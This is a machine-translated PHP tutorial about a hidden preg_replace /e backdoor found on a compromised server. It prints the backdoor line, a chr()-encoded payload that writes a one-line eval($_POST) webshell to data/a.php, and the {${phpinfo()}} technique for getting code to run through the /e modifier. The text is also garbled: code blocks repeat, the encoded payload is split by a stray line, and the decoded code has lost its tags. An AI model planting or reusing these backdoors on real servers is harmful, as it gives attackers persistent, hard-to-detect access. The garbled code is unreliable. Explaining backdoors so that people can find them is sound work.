preg_replace hidden backdoor and subsequent exploration_PHP tutorial

There are many PHP backdoors, and I have seen and played with Baozi a lot, but when I helped a friend check the server, I found such malicious code.

The thing is like this, using various backdoor search tools on my friend’s website, no PHP Trojan was found. I can’t always find it. Xiao Hei’s tricks are very advanced. Every time I use them

After using it, I always delete the backdoor, but I can still come in every time, but I can’t find where it came in. This is really painful.

Later, I finally found some clues in the logs. Through my analysis, I found that an IP always posted strange data to a certain file. Then a paragraph

After a while, this IP accessed an inexplicable file with a very conspicuous name. It was obviously not a normal system file, but a PHP backdoor. But soon after using the backdoor

was deleted.

Haha, Xiao Hei is very attentive when I meet him.

Then through analysis, it was found that the file discovery code accessed by Xiaohei:

The code is as follows

Copy code

代码如下	复制代码
@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

It’s okay if you see this code, but this is the malicious code and backdoor hidden by Xiaohei. Go covert, basically anything

No anti-virus software can detect it.

preg_replace function prototype:

mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Special instructions:

The

/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreferences have been replaced). Tip: Make sure

replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace()

Wrong.

The above code is for POST to accept data and needs to be tested, which is more troublesome. If it is replaced by GET to obtain data. . .

Example:

代码如下	复制代码
echo preg_replace("/test/e",$_GET["h"],"jutst test");

The code is as follows	Copy code
echo preg_replace("/test/e",$_GET["h"],"jutst test");

If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP

Code execution).

代码如下

复制代码

?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr (110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

If we want to POST, what will happen if we test and submit the following code?

The code is as follows

Copy code

?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112). chr(101).chr

代码如下	复制代码
fputs(fopen(data/a.php,w),);

(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46 ).chr(112).chr(104).chr (112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60 ).chr(63).chr(112).chr (104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95 ).chr(80).chr(79).chr (83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62 ).chr(39).chr(41).chr(59))

The plaintext corresponding to the ciphertext is:

The code is as follows	Copy code
fputs(fopen(data/a.php,w),);

The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.

This is terrifying. . . .

Another difficult example:

View code printing?

Note: Functions enclosed in double quotes will not be executed and replaced.

The code is as follows

代码如下	复制代码
function test($str) { } echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]); ?>

Copy code

function test($str)

{

}

echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);

?>

Submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?

Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time

Counted.

Is there any way to make it execute?

Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?

代码如下	复制代码
1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");

In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.

Here we need to construct a special variable, 'test("{${phpinfo()}}")' through {${}}, to achieve the effect of allowing the function to be executed

(${phpinfo()} will be interpreted and executed).

You can do the following test first: echo "{${phpinfo()}}"; phpinfo will be executed successfully. So, please pay attention when looking for backdoors. OK, having said so much and understanding it, the code I gave above:

The code is as follows

Copy code

1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied"); What looks like a normal code is actually an extremely dangerous code, which is quite hidden http://www.bkjia.com/PHPjc/629643.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/629643.htmlTechArticleThere are many PHP backdoors, and Baozi has seen and played with them a lot, but when I helped a friend check the server , unexpectedly found such malicious code. Here’s the thing, my friend’s website...